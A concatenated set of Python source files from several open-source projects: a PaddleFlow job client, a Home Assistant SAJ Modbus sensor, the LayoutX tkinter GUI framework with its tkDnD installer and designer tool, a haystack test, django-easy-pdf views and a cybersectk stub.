        return RunServiceApi.artifact(self.paddleflow_server, userfilter, fsfilter, runfilter, typefilter,
                                      pathfilter, maxkeys, marker, self.header)

    def list_cache(self, userfilter=None, fsfilter=None, runfilter=None, maxkeys=None, marker=None):
        """ list run cache """
        self.pre_check()
        return RunServiceApi.list_runcache(self.paddleflow_server, userfilter, fsfilter, runfilter,
                                           maxkeys, marker, self.header)

    def show_cache(self, cacheid):
        """ show run cache """
        self.pre_check()
        if cacheid is None or cacheid == "":
            raise PaddleFlowSDKException("InvalidCacheID", "cacheid should not be none or empty")
        return RunServiceApi.show_runcache(self.paddleflow_server, cacheid, self.header)

    def delete_cache(self, cacheid):
        """ delete run cache """
        self.pre_check()
        if cacheid is None or cacheid == "":
            raise PaddleFlowSDKException("InvalidCacheID", "cacheid should not be none or empty")
        return RunServiceApi.delete_runcache(self.paddleflow_server, cacheid, self.header)

    def show_log(self, runid, jobid=None, pagesize=None, pageno=None, logfileposition=None):
        """ show run log """
        self.pre_check()
        if runid is None or runid == "":
            raise PaddleFlowSDKException("InvalidRunID", "runid should not be none or empty")
        return LogServiceApi.get_log_info(self.paddleflow_server, runid, jobid, pagesize, pageno,
                                          logfileposition, self.header)

    def create_job(self, job_type, job_request):
        """ create_job """
        self.pre_check()
        if job_type is None or (job_type != 'single' and job_type != 'distributed' and job_type != 'workflow'):
            raise PaddleFlowSDKException("InvalidJobType",
                                         "job_type should not be none and should be single, distributed or workflow")
        if job_request.queue is None or job_request.queue == '':
            raise PaddleFlowSDKException("InvalidJobRequest", "job_request queue should not be none or empty")
        return JobServiceApi.create_job(self.paddleflow_server, job_type, job_request, self.header)

    def show_job(self, jobid):
        """ show_job """
        self.pre_check()
        if jobid is None or jobid == "":
            raise PaddleFlowSDKException("InvalidJobID", "jobid should not be none or empty")
        return JobServiceApi.show_job(self.paddleflow_server, jobid, self.header)

    def list_job(self, status=None, timestamp=None, start_time=None, queue=None, labels=None,
                 maxkeys=None, marker=None):
        """ list_job """
        self.pre_check()
        return JobServiceApi.list_job(self.paddleflow_server, status, timestamp, start_time, queue, labels,
                                      maxkeys, marker, self.header)

    def stop_job(self, jobid):
        """ stop_job """
        self.pre_check()
        if jobid is None or jobid == "":
            raise PaddleFlowSDKException("InvalidJobID", "jobid should not be none or empty")
        return JobServiceApi.stop_job(self.paddleflow_server, jobid, self.header)

    def delete_job(self, jobid):
        """ delete_job """
        self.pre_check()
        if jobid is None or jobid == "":
            raise PaddleFlowSDKException("InvalidJobID", "jobid should not be none or empty")
        return JobServiceApi.delete_job(self.paddleflow_server, jobid,
                                        self.header)
```
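For orientation, here is a minimal usage sketch of the client methods above. The import path, constructor signature, and `login()` call are assumptions for illustration (they are not part of the snippet itself), so treat this as a sketch rather than the SDK's documented API:

```python
# Hypothetical usage sketch -- the Client import path, constructor and login()
# are assumed; only the queue/run methods themselves are shown above.
from paddleflow.client import Client  # assumed import path

client = Client("paddleflow.example.com", "demo-user", "demo-password")  # hypothetical endpoint/credentials
ok, message = client.login("demo-user", "demo-password")  # assumed to populate self.header
if ok:
    ok, queues = client.list_queue(maxsize=10)
    print(queues if ok else message)
```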
{ "source": "8OND007/home-assistant-saj-modbus", "score": 2 }
#### File: custom_components/saj_modbus/sensor.py
```python
from __future__ import annotations

from datetime import datetime
from homeassistant.helpers.update_coordinator import CoordinatorEntity
from homeassistant.components.sensor import SensorEntity
import logging
from typing import Optional

from homeassistant.const import CONF_NAME
from homeassistant.core import callback
import homeassistant.util.dt as dt_util

from .const import (
    ATTR_MANUFACTURER,
    DOMAIN,
    SENSOR_TYPES,
    SajModbusSensorEntityDescription,
)
from .hub import SAJModbusHub

_LOGGER = logging.getLogger(__name__)


async def async_setup_entry(hass, entry, async_add_entities):
    hub_name = entry.data[CONF_NAME]
    hub = hass.data[DOMAIN][hub_name]["hub"]

    device_info = {
        "identifiers": {(DOMAIN, hub_name)},
        "name": hub_name,
        "manufacturer": ATTR_MANUFACTURER,
    }

    entities = []
    for sensor_description in SENSOR_TYPES.values():
        sensor = SajSensor(
            hub_name,
            hub,
            device_info,
            sensor_description,
        )
        entities.append(sensor)

    async_add_entities(entities)
    return True


class SajSensor(CoordinatorEntity, SensorEntity):
    """Representation of an SAJ Modbus sensor."""

    def __init__(
        self,
        platform_name: str,
        hub: SAJModbusHub,
        device_info,
        description: SajModbusSensorEntityDescription,
    ):
        """Initialize the sensor."""
        self._platform_name = platform_name
        self._attr_device_info = device_info
        self.entity_description: SajModbusSensorEntityDescription = description

        super().__init__(coordinator=hub)

    @property
    def name(self):
        """Return the name."""
        return f"{self._platform_name} {self.entity_description.name}"

    @property
    def unique_id(self) -> Optional[str]:
        return f"{self._platform_name}_{self.entity_description.key}"

    @property
    def native_value(self):
        """Return the state of the sensor."""
        return (
            self.coordinator.data[self.entity_description.key]
            if self.entity_description.key in self.coordinator.data
            else None
        )
```
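The entities above are generated purely from `SENSOR_TYPES`, whose real definition lives in `const.py` and is not part of this snippet. As a loosely hedged illustration of what one entry might look like (the field names are borrowed from Home Assistant's standard `SensorEntityDescription`; the actual dataclass may differ):

```python
# Illustrative only -- the real SajModbusSensorEntityDescription fields are
# defined in const.py, which is not shown here.
SENSOR_TYPES = {
    "pv1_voltage": SajModbusSensorEntityDescription(
        key="pv1_voltage",               # index into coordinator.data in native_value
        name="PV1 Voltage",              # suffixed to the hub name in SajSensor.name
        native_unit_of_measurement="V",  # standard SensorEntityDescription field
    ),
}
```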
{ "source": "8or5q/LayoutX", "score": 3 }
#### File: LayoutX/demo/show_image.py
```python
from layoutx import app
from layoutx.store import create_store
from layoutx.view import View, ResizeOption

store = create_store({
  "SET_IMAGE": lambda state, payload: {**state, **{"data": payload}}
}, {
  "data": ""
})

class ImageShowcase(View):
  geometry = "800x600+200+200"
  title = "ImageViewer"
  resizable = ResizeOption.NONE
  template = """\
Box
  Label(weight="0") Image Viewer
  ImageViewer(name="image" background="black" imagedata="{data}")
  Button(weight="0" height="20" command="{load_image}") New Image
"""

  async def load_image(self):
    # Find view child widget; api not yet finalized
    imageViewer = self._widget.find_first("image")
    # Get tkinter attributes
    height = imageViewer.widget.tk.winfo_height()
    width = imageViewer.widget.tk.winfo_width()
    import aiohttp
    import io
    from random import randint
    imagedata = None
    session = aiohttp.ClientSession()
    async with session.get(f"http://placekitten.com/{width}/{height}?image={randint(0,17)}") as imageResource:
      from PIL import Image, ImageTk
      load = Image.open(io.BytesIO(await imageResource.read()))
      imagedata = ImageTk.PhotoImage(load)
    await session.close()
    self.store.dispatch("SET_IMAGE", imagedata)

from layoutx.widgets import Widget
from tkinter import ttk

class ImageViewer(Widget):
  def __init__(self, master, **kwargs):
    super().__init__(tk=ttk.Label(master=master), **kwargs)
    self.connect_to_prop("imagedata", self.on_imagedata_changed)

  def on_imagedata_changed(self, imagedata):
    if imagedata == '':
      return
    self._tk.configure(image=imagedata)

app.add_custom_widget("ImageViewer", ImageViewer)

if __name__ == "__main__":
  app.setup(store=store, rootView=ImageShowcase)
  app.run()
```
#### File: LayoutX/layoutx/app.py
```python
import tkinter as tk
import tkinter.font as tkFont
from .store import Store
from .view import View, ResizeOption
from .utils import Singleton, is_windows
from ._registry import RegistryNode
from .tkDnD import TkinterDnD
import logging
import asyncio

__all__ = ["Application"]

@Singleton
class Application(RegistryNode):
  def __init__(self):
    super().__init__(widget=self, name="app")
    # Import Widgets
    import layoutx.widgets
    self._widgets = {}
    for name in layoutx.widgets.__all__:
      self._widgets.update({name: getattr(layoutx.widgets, name)})
    self._tk = None
    self._loop = None
    self._root_node = None
    self._style = None
    self._config = {}

  def setup(self, store: Store, rootView: View, font=None, style: str=None, interval=1/120, loop=None):
    if not self._tk:
      self._tk = TkinterDnD.Tk()
      self._loop = loop if loop else asyncio.get_event_loop()
      self._tk.protocol("WM_DELETE_WINDOW", self.close)
      self._ui_task = self._loop.create_task(self._updater(interval))

    # Pick first system font as default if none given
    if font:
      self._config["font"] = font
    else:
      if is_windows():
        self._config["font"] = {"family": "Courier New", "size": 12} if "Courier New" in tkFont.families() \
          else {"family": tkFont.families()[1], "size": 12}
      else:
        self._config["font"] = {"family": "DejaVu Sans Mono", "size": 12} if "DejaVu Sans Mono" in tkFont.families() \
          else {"family": tkFont.families()[1], "size": 12}

    if style and not self._style:
      try:
        from ttkthemes import ThemedStyle
        self._style = ThemedStyle(self._tk)
        self._style.set_theme(style)
      except ImportError:
        # ttkthemes not installed
        self._style = tk.ttk.Style()
    else:
      self._style = tk.ttk.Style()

    if self._root_node:
      self.remove_node(self._root_node)

    self._root_node = self.add_view(rootView(
      tkinter=self._tk,
      store=store
    ))
    self._root_node.widget.redraw()

  @property
  def loop(self):
    return self._loop
  def close(self):
    self._ui_task.add_done_callback(lambda *_: self._cleanup())
    self._ui_task.cancel()

  @property
  def config(self):
    return self._config

  @property
  def style(self):
    return self._style

  def run(self):
    self._loop.run_forever()
    self._loop.close()

  def get_root_node(self) -> RegistryNode:
    return self._root_node

  def get_view(self, name: str) -> RegistryNode:
    filter_view = self.filter_children(name=name)
    if len(filter_view) == 1:
      return filter_view[0]
    else:
      raise ValueError(f"View {name} not registered")

  def add_view(self, view: View) -> RegistryNode:
    name = view.__class__.__name__
    old_view = self.filter_children(name=name)
    if len(old_view) > 0:
      self.remove_node(old_view[0])
    if len(self.children) > 0:
      view.hide()
    return self._add_node(widget=view, name=view.__class__.__name__)

  def add_custom_widget(self, name, cls):
    if name in self._widgets:
      raise ValueError(f"Widget name: {name} already exists")
    self._widgets[name] = cls

  def update(self):
    self._tk.update()

  def get_widget_cls(self, name):
    if name not in self._widgets:
      raise KeyError(f"Widget: {name}, does not exist or was never added to the registry")
    return self._widgets[name]

  async def _updater(self, interval):
    while True:
      self.update()
      await asyncio.sleep(interval)

  def _cleanup(self):
    self._loop.stop()
    self._tk.destroy()
```
#### File: LayoutX/layoutx/install_tkdnd.py
```python
import platform
import urllib.request
import io
import subprocess
import pathlib
import shutil
import hashlib
import time

def dnd_installed():
  try:
    import tkinter
    tk_root = tkinter.Tk()
    version = tk_root.tk.call('package', 'require', 'tkdnd')
    tk_root.tk.call('package', 'forget', 'tkdnd')
    tk_root.destroy()
    tk_root.tk = None
    tk_root = None
    return version
  except:
    return False

def dnd_install():
  urls = {
    "Windows": "https://github.com/petasis/tkdnd/releases/download/tkdnd-release-test-v2.9.2/tkdnd-2.9.2-windows-x64.zip",
    "Linux": "https://github.com/petasis/tkdnd/releases/download/tkdnd-release-test-v2.9.2/tkdnd-2.9.2-linux-x64.tgz",
    "Darwin": "https://github.com/petasis/tkdnd/releases/download/tkdnd-release-test-v2.9.2/tkdnd-2.9.2-osx-x64.tgz",
    "RaspberryPiOS": "https://github.com/8or5q/otp-voip/raw/master/pi_11/tkdnd-2.9.2-linux-armhf.tgz",
  }
  hashes = {
    "Windows": "d78007d93d8886629554422de2e89f64842ac9994d226eab7732cc4b59d1feea",
    "Linux": "f0e956e4b0d62d4c7e88dacde3a9857e7a303dc36406bdd4d33d6459029a2843",
    "Darwin": "0c604fb5776371e59f4c641de54ea65f24917b8e539a577484a94d2f66f6e31d",
    "RaspberryPiOS": "19f16116fcfc14459bbee80ab00766da6a15445d88fb011f76a13589ff54e945",
  }
  print("Starting installation of tkDND")
  os = platform.system()
  machine = platform.machine()
  if machine.startswith("arm"):
    os = 'RaspberryPiOS'
  elif os not in ["Windows", "Linux", "Darwin"]:
    print(f"{os} not supported!")
    exit(0)
  result = None
  archive = None
  url = urls[os]
  download_hash = hashes[os]
  import tkinter
  root = tkinter.Tk()
  tcl_dir = pathlib.Path(root.tk.exprstring('$tcl_library'))
  for p in tcl_dir.glob("tkdnd*"):
    print("tkdnd already installed")
    shutil.rmtree(p)
  print("Download tkDnD libraries from github")
  data = urllib.request.urlopen(url).read()
  data_hash = hashlib.sha256(data).hexdigest()
  if (download_hash != data_hash):
    print(f"Got hash: {data_hash}")
    print(f"Expected hash: {download_hash}")
    print("Download incomplete or your security is compromised!!!")
    exit(1)
  print("Extracting tkDnD to tcl extension folder")
  if os == "Windows":
    import zipfile
    archive = zipfile.ZipFile(io.BytesIO(data))
    archive.extractall(path=tcl_dir)
  elif os == "Linux" or os == "Darwin" or os == "RaspberryPiOS":
"RaspberryPiOS": import tarfile archive = tarfile.open(fileobj=io.BytesIO(data)) archive.extractall(path=tcl_dir) print("tkdnd installed!") if __name__ == "__main__": min_version = "2.9.2" version = dnd_installed() if not version or version < min_version: dnd_install() ``` #### File: layoutx/tools/designer.py ```python from layoutx import app from layoutx.store import create_store from layoutx.view import View, ResizeOption import asyncio import ast import logging import sys def create_view(template, methods): newline = '\n' exec(f""" class DemoView(View): geometry = "400x400+900+100" title = "Demo" template = \"\"\"{template}\"\"\" { newline.join([f" {line}" for line in methods.split(newline)]) } """) return eval("DemoView") store = create_store({}, { "data": """\ { "name": "news", "counter": 0, "isBool": True, "code": "import antigravity" }""", "template": """\ ScrollFrame Button(command="{partial(print_hello, name)}") asyncio Button(command="{reducer}") | Hello {name} Label(:Button-1:="{partial(print_hello, 'label clicked')}") {name} Label hello {getter()} """, "view": """\ async def print_hello(self, txt, *args): import asyncio await asyncio.sleep(1) print("tkEvent", args) print(txt) def getter(self): return 'dynamic getter' def on_drop(self, path): print(path) def reducer(self): self.store.dispatch("SET_NAME", "from reducer") """, "store": """\ { "SET_NAME": lambda state, payload: {**state, **{"name": payload}} } """ }) class RootView(View): geometry = "800x600+100+100" title = "Designer" template = """\ SplitPane(orient="vertical") SplitPane Box Template TextArea(autocomplete="{get_autocomplete()}", highlightstyle="monokai", spaces="2", language="pug" value="{{template}}") Box Store data TextArea(highlightstyle="monokai", spaces="2", language="json" value="{{data}}" ) SplitPane Box View Methods TextArea(highlightstyle="monokai", spaces="2", language="python" value="{{view}}") Box Store Reducer TextArea(highlightstyle="monokai", spaces="2", language="python" value="{{store}}") """ demoView = None demoStore = None def get_autocomplete(self): return [{ "name": "Label", "value": "Label hello" },{ "name": "Button", "value": "Button(command=\"{cmd}\")" }, { "name": "Box", "value": "Box(orient=\"vertical\")" },{ "name": "SplitPane", "value": "SplitPane" },{ "name": "ComboBox", "value": "ComboBox(value='{{name}}', suggestion=['1','2'])" },{ "name": "CheckBox", "value": "CheckBox(value='{{isBool}}') Check me" },{ "name": "DropTarget", "value": "DropTarget(on_drop=\"{on_drop}\")" },{ "name": "TextArea", "value": "TextArea(highlightstyle='monokai', spaces='2', language='python', value='{{code}}' )" },{ "name": "ScrollFrame", "value": "ScrollFrame" },{ "name": "Scale", "value": "Scale(value='{{counter}}' to=\"100\")" },{ "name": "Input", "value": "Input(value='{{name}}' suggestion=['1', '2'])" }] def set_menu(self): return { "Reload UI": self.update_ui, "Update Data": self.update_data, "Import Example": self.import_data, "Export Example": self.export_data } @property def _get_state(self): return self._store.state def export_data(self): from tkinter import filedialog import json filename = filedialog.asksaveasfilename(filetypes=[('LxDesign File', '.lxconfig')], defaultextension=".lxconfig") if filename: with open(filename, "w", encoding='utf-8') as dataFile: dataFile.writelines(json.dumps(self._get_state)) def import_data(self): from tkinter import filedialog, messagebox try: data = filedialog.askopenfilename(filetypes=[('LxDesign File', '.lxconfig')], defaultextension=".lxconfig") if data is 
        return
      with open(data, "r", encoding='utf-8') as dataFile:
        self.store._state.on_next(ast.literal_eval(dataFile.read()))
    except:
      messagebox.showerror("Error", "Import Data not valid")

  def _create_view(self):
    self.demoStore = create_store(eval(self._get_state["store"]), ast.literal_eval(self._get_state["data"]))
    view_class = create_view(self._get_state["template"], self._get_state["view"])
    self.demoView = app.add_view(view_class(store=self.demoStore)).widget
    if len(self.demoView.logger.handlers) == 0:
      handler = logging.StreamHandler(sys.stdout)
      handler.setLevel(logging.DEBUG)
      formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
      handler.setFormatter(formatter)
      self.demoView.logger.addHandler(handler)
    self.demoView.show()

  def update_ui(self):
    if self.demoView:
      self.demoView.redraw(self._get_state["template"])
    else:
      self._create_view()

  def update_data(self):
    if self.demoStore:
      self.demoStore._state.on_next(ast.literal_eval(self._get_state["data"]))
    else:
      self._create_view()

  def update_store(self):
    self._create_view()

def main():
  app.setup(store=store, rootView=RootView)
  app.run()

if __name__ == "__main__":
  app.setup(store=store, rootView=RootView)
  app.run()
```
#### File: LayoutX/layoutx/utils.py
```python
import platform
from typing import List, Callable
from copy import deepcopy, copy
import ast
from functools import reduce

__all__ = [
  "get_os",
  "is_windows",
  "safe_get",
  "safe_set",
  "safer_eval",
  "safe_list",
  "safe_dict"
]

class Singleton:
  def __init__(self, decorated):
    self._decorated = decorated

  def instance(self, **kwargs):
    try:
      return self._instance
    except AttributeError:
      self._instance = self._decorated(**kwargs)
      return self._instance

  def __call__(self):
    raise TypeError('Singletons must be accessed through `instance()`.')

def get_os():
  return platform.system()

def is_windows():
  return get_os() == "Windows"

def safe_get(data, keys: List[str]):
  for key in keys:
    try:
      data = data[int(key)] if isinstance(data, list) else data[key]
    except KeyError:
      return None
  return data

def safe_set(data, keys: List[str], value):
  data_copy = deepcopy(data)
  dic = data_copy
  for key in keys[:-1]:
    dic = dic[int(key)] if isinstance(dic, list) else dic.setdefault(key, {})
  dic[int(keys[-1]) if isinstance(dic, list) else keys[-1]] = value
  return data_copy

safe_list = [
  'abs', 'all', 'any', 'ascii', 'bin', 'callable', 'chr', 'dir', 'divmod',
  'format', 'getattr', 'hasattr', 'hash', 'hex', 'id', 'input', 'isinstance',
  'issubclass', 'iter', 'len', 'max', 'min', 'next', 'oct', 'ord', 'pow',
  'repr', 'round', 'sorted', 'sum', 'bool', 'bytearray', 'bytes', 'complex',
  'dict', 'enumerate', 'filter', 'float', 'frozenset', 'int', 'list', 'map',
  'object', 'range', 'reversed', 'set', 'slice', 'str', 'tuple', 'type', 'zip',
  'partial'
]

safe_dict = dict([(k, globals()["__builtins__"].get(k)) for k in safe_list])
from functools import partial
safe_dict["partial"] = partial

def safer_eval(exp: str, variables={}):
  return eval(exp, {"__builtins__": None}, dict(copy(safe_dict), **variables))

def security_check_ast(tree: ast.AST, allowed_internal_names=[]):
  for node in ast.walk(tree):
    # Block Assignments, Imports, Deletion, etc.
    if isinstance(node, (
        ast.Assign, ast.Assert, ast.AnnAssign, ast.AugAssign, ast.alias,
        ast.FunctionDef, ast.Import, ast.ImportFrom, ast.Del, ast.Delete,
        ast.Global, ast.Nonlocal)):
      raise ValueError(f"Illegal Expression Type: {node.__class__.mro()[0].__name__}")
    import sys
    # Python 3.8
    if sys.version_info >= (3, 8) and isinstance(node, ast.NamedExpr):
      raise ValueError(f"Illegal Expression Type: {node.__class__.mro()[0].__name__}")
    if isinstance(node, ast.Name):
      if node.id not in allowed_internal_names and node.id.startswith("_"):
        raise ValueError(f"Internal Name cannot be used!")
    if isinstance(node, (ast.NameConstant, ast.Constant)):
      if str(node.value).startswith("_"):
        raise ValueError(f"Internal Name cannot be used!")
    if isinstance(node, ast.Attribute):
      if node.attr.startswith("_"):
        raise ValueError(f"Internal Name cannot be used!")
    if isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
      if node.func.id.startswith("_"):
        raise ValueError(f"Function {node.func.id} cannot be used!")
    #if isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute):
    #  raise ValueError(f"Cannot use object methods")

def compile_exp(exp: str, path_mapping={}, allowed_names=[], attr2sub=False, mode="eval"):
  return compile_ast(ast.parse(exp).body[0].value, path_mapping=path_mapping,
                     allowed_names=allowed_names, attr2sub=attr2sub, mode=mode)

def compile_ast(tree: ast.AST, path_mapping={}, allowed_names=[], attr2sub=False, mode="eval"):
  #allowed_names += ["_r", "_s"]
  # Security Check
  security_check_ast(tree, allowed_internal_names=allowed_names)
  reslv_abs_mod = ResolveAbsolutePath(name_mapping=path_mapping, no_name_replace=attr2sub,
                                      reserved_names=allowed_names)
  attr2sub_mod = Attribute2Subscribe()
  tree = reslv_abs_mod.visit(tree)
  tree = attr2sub_mod.visit(tree)
  if mode == "eval":
    expr = ast.Expression(body=tree)
  elif mode == "exec":
    tree.ctx = ast.Store()
    expr = ast.Module(body=[
      ast.Assign(
        targets=[tree],
        value=ast.Name(id='_value', ctx=ast.Load())
      )
    ], type_ignores=[])
  expr = ast.fix_missing_locations(expr)
  return compile(expr, filename="<ast>", mode=mode)

def eval_compiled(comp, variables={}):
  try:
    return eval(comp, {"__builtins__": None}, dict(copy(safe_dict), **variables))
  except:
    return None

def set_state(comp, variables, value):
  exec(comp, {"__builtins__": None, "_value": value}, variables)

class ResolveAbsolutePath(ast.NodeTransformer):
  def __init__(self, name_mapping=None, reserved_names=[], no_name_replace=False):
    super().__init__()
    self._no_name_replace = no_name_replace
    self._name_mapping = name_mapping
    self._ignore_built_in = safe_list + reserved_names

  def visit_Name(self, node: ast.Name):
    if node.id in self._ignore_built_in or self._no_name_replace:
      return self.generic_visit(node)
    if self._name_mapping and node.id in self._name_mapping:
      return self.generic_visit(self._name_mapping[node.id])
    return self.generic_visit(node)

class Attribute2Subscribe(ast.NodeTransformer):
  def visit_Attribute(self, node: ast.Attribute):
    attr = ast.Str(s=node.attr)
    index = ast.copy_location(ast.Index(
      value=ast.copy_location(attr, node)
    ), node)
    return self.generic_visit(ast.copy_location(
      ast.Subscript(
        value=node.value,
        ctx=ast.Load(),
        slice=index
      ), node))
```
#### File: layoutx/widgets/logger.py
```python
from .widget import Widget
import tkinter as tk
from tkinter import ttk, END
from tkinter.scrolledtext import ScrolledText
import logging
import re

class Logger(Widget):
  class LoggingFilter(logging.Filter):
    def __init__(self, level, regex_filter):
      # Store the current level name and message regex; the original
      # referenced attributes that were never set on this class.
      super().__init__()
      self._level = level
      self._regex_filter = regex_filter

    def filter(self, record):
      # LogRecord has no 'level'/'message' attributes before formatting;
      # compare against levelname and the rendered message instead.
      return record.levelname == self._level and \
        re.match(self._regex_filter, record.getMessage()) is not None

  class Handler(logging.Handler):
    def __init__(self, widget):
      logging.Handler.__init__(self)
      self.setFormatter(logging.Formatter("%(asctime)s: %(message)s"))
      self._tk = widget
      self._tk.config(state='disabled')

    def emit(self, record):
      self._tk.config(state='normal')
      if record.msg.startswith("INIT"):
        self._tk.insert(END, self.format(record) + "\n", "init")
      elif record.msg.startswith("DISPOSE"):
        self._tk.insert(END, self.format(record) + "\n", "dispose")
      else:
        self._tk.insert(END, self.format(record) + "\n")
      self._tk.see(END)
      self._tk.config(state='disabled')

  def __init__(self, **kwargs):
    self._tk = ScrolledText(master=kwargs.get("master").container)
    Widget.__init__(self, **kwargs)
    self.logging_handler = Logger.Handler(self._tk)
    self._logger.addHandler(self.logging_handler)
    self._level = self.get_attr("level", "DEBUG")
    self._regex_filter = self.get_attr("filter", ".*")

  def on_changed_level(self, value):
    self._level = value
    self._setFilters()

  def on_changed_filter(self, value):
    self._regex_filter = value
    self._setFilters()

  def clear(self):
    self._tk.delete("1.0", tk.END)

  def _setFilters(self):
    for log_filter in self.logging_handler.filters:
      self.logging_handler.removeFilter(log_filter)
    # The original added the bare (and here undefined) class name;
    # instantiate the nested filter with the current settings instead.
    self.logging_handler.addFilter(Logger.LoggingFilter(self._level, self._regex_filter))

  def dispose(self):
    self._logger.removeHandler(self.logging_handler)
    super().dispose()
```
#### File: layoutx/widgets/progressbar.py
```python
from .widget import Widget
from tkinter import ttk, IntVar

class ProgressBar(Widget):
  def __init__(self, master, **kwargs):
    self._value = IntVar()
    super().__init__(tk=ttk.Progressbar(
      master=master,
      variable=self._value
    ), **kwargs)
    self.connect_to_prop("value", self.on_changed_value)

  def on_changed_value(self, value):
    self._value.set(int(value))

  def on_disposed(self):
    self._value = None
```
#### File: layoutx/widgets/spinbox.py
```python
from .widget import Widget
from tkinter import ttk, StringVar

class SpinBox(Widget):
  def __init__(self, master, **kwargs):
    self._textv = StringVar()
    super().__init__(
      tk=ttk.Spinbox(master, textvariable=self._textv),
      **kwargs
    )
    self._setter = self.connect_to_prop("value", self.on_changed_value)
    self._trace = self._textv.trace_add("write", lambda *_: self._setter(self._textv.get()))

  def on_changed_value(self, value):
    if value:
      self._textv.set(value)

  def on_disposed(self):
    self._textv.trace_remove("write", self._trace)
    self._setter = None
```
#### File: LayoutX/tests/test_parser.py
```python
import unittest
from layoutx._parser import parse_pug_to_obj, XMLElement

class TestParser(unittest.TestCase):
  def test_simple(self):
    template = \
"""
Button Hello world
"""
    parsed = parse_pug_to_obj(template)
    assert issubclass(parsed.__class__, XMLElement)
    assert parsed.tag == "Button"
    assert parsed.text == "Hello world"

  def test_children(self):
    template = \
"""
Parent
  Child 1
  Child 2
"""
    parsed = parse_pug_to_obj(template)
    assert parsed.tag == "Parent"
    assert parsed.count_children == 2
    assert parsed.children[0].text == '1'
    assert parsed.children[1].text == '2'

  def test_attr(self):
    template = \
"""
Parent
  Child(string="attr_a" int=123 obj={'key': 'value'} bool=False)
"""
    parsed = parse_pug_to_obj(template)
    assert parsed.tag == "Parent"
    child = parsed.children[0]
    assert child.tag == "Child"
    assert child.get_attribute("none", None) == None
    assert child.get_attribute("string") == "attr_a"
    assert child.get_attribute("int") == 123
    assert child.get_attribute("obj") == {'key': 'value'}
    assert child.get_attribute("bool") == False

if __name__ == '__main__':
  unittest.main()
```
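The sandboxed expression pipeline in `utils.py` above (`safer_eval`, `compile_exp`, `eval_compiled`) is easiest to see with a tiny example. This sketch only exercises the functions exactly as defined there and assumes the package's import layout; note that the `ast.Str`/`ast.Index` usage ties the library to the Python versions it targets:

```python
# Minimal sketch of the sandboxed evaluation helpers from layoutx/utils.py.
from layoutx.utils import safer_eval, compile_exp, eval_compiled

print(safer_eval("max(len('abc'), 2)"))         # 3 -- only whitelisted builtins are available
comp = compile_exp("data.name", attr2sub=True)  # Attribute2Subscribe rewrites this to data['name']
print(eval_compiled(comp, {"data": {"name": "news"}}))  # 'news'
```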
{ "source": "8otco/haystack", "score": 2 }
#### File: haystack/test/test_modeling_prediction_head.py
```python
import logging

from haystack.modeling.model.adaptive_model import AdaptiveModel
from haystack.modeling.model.language_model import LanguageModel
from haystack.modeling.model.prediction_head import QuestionAnsweringHead
from haystack.modeling.utils import set_all_seeds, initialize_device_settings


def test_prediction_head_load_save(tmp_path, caplog=None):
    if caplog:
        caplog.set_level(logging.CRITICAL)

    set_all_seeds(seed=42)
    device, n_gpu = initialize_device_settings(use_cuda=False)
    lang_model = "bert-base-german-cased"

    language_model = LanguageModel.load(lang_model)
    prediction_head = QuestionAnsweringHead()

    model = AdaptiveModel(
        language_model=language_model,
        prediction_heads=[prediction_head],
        embeds_dropout_prob=0.1,
        lm_output_types=["per_sequence"],
        device=device)

    model.save(tmp_path)
    model_loaded = AdaptiveModel.load(tmp_path, device='cpu')
    assert model_loaded is not None
```
{ "source": "8percent/django-easy-pdf", "score": 2 }
#### File: django-easy-pdf/easy_pdf/views.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals

try:
    # noinspection PyUnresolvedReferences
    from typing import Any, Dict, Optional, Text, Type
except ImportError:
    pass

from django.http import HttpResponse, HttpRequest
from django.views.generic.base import ContextMixin, TemplateResponseMixin, View

from .rendering import render_to_pdf_response, CONTENT_TYPE


class PDFTemplateResponseMixin(TemplateResponseMixin):
    """
    A mixin class that implements PDF rendering and Django response construction.
    """

    #: Optional name of the PDF file for download. Leave blank for display in browser.
    download_filename = None  # type: Optional[Text]

    #: Base URL for referencing relative images, fonts and stylesheet resources.
    base_url = None  # type: Optional[Text]

    #: Response class. Defaults to :class:`django.http.HttpResponse`.
    response_class = HttpResponse  # type: Type[HttpResponse]

    #: Response content type. Default is ``'application/pdf'``.
    content_type = CONTENT_TYPE  # type: Text

    def get_download_filename(self):
        # type: () -> Optional[Text]
        """
        Returns :attr:`download_filename` value by default.

        If left blank the browser will display the PDF inline.
        Otherwise it will pop up the "Save as.." dialog.

        :rtype: :class:`str` or None
        """
        return self.download_filename

    def get_base_url(self):
        # type: () -> Optional[Text]
        """
        Returns :attr:`base_url` value by default.

        :rtype: :class:`str` or None
        """
        return self.base_url

    def get_render_kwargs(self):
        # type: () -> Dict[Text, Any]
        """
        The render kwargs are passed to :func:`~easy_pdf.rendering.html_to_pdf`.
        """
        return {
            'download_filename': self.get_download_filename(),
            'base_url': self.get_base_url()
        }

    def get_pdf_response(self, context):
        # type: (Dict) -> HttpResponse
        """
        Renders PDF document and prepares response.

        :returns: Django HTTP response
        :rtype: :class:`django.http.HttpResponse`
        """
        return render_to_pdf_response(
            request=self.request,
            template=self.get_template_names(),
            context=context,
            using=self.template_engine,
            response_class=self.response_class,
            content_type=self.content_type,
            **self.get_render_kwargs()
        )

    def render_to_response(self, context, **response_kwargs):
        # type: (Dict, Any) -> HttpResponse
        # response_kwargs.setdefault('content_type', self.content_type)
        return self.get_pdf_response(context)


class PDFTemplateView(PDFTemplateResponseMixin, ContextMixin, View):
    """
    A view that renders template to PDF document in a way similar
    to Django's :class:`~django.views.generic.base.TemplateView`

    .. code-block:: python

        class HelloPDFView(PDFTemplateView):
            template_name = "hello.html"
    """

    def get(self, request, *args, **kwargs):
        # type: (HttpRequest, Any, Any) -> HttpResponse
        """
        Handles GET request and returns HTTP response.
        """
        context = self.get_context_data(**kwargs)
        return self.render_to_response(context)
```
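To make the `HelloPDFView` from the docstring reachable, it still has to be wired into a URLconf. A minimal sketch (the URL pattern and module names are illustrative, not part of the package):

```python
# urls.py -- hypothetical wiring for the HelloPDFView docstring example.
from django.urls import path
from .views import HelloPDFView  # the PDFTemplateView subclass from the docstring

urlpatterns = [
    # as_view() kwargs override class attributes, so this forces a download dialog
    path("hello.pdf", HelloPDFView.as_view(download_filename="hello.pdf")),
]
```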
{ "source": "8pod/CyberSecTK-Library", "score": 2 }
#### File: cybersectk/cybersectk/utilities.py
```python
import os
import glob
import pandas as pd
from scapy.all import *
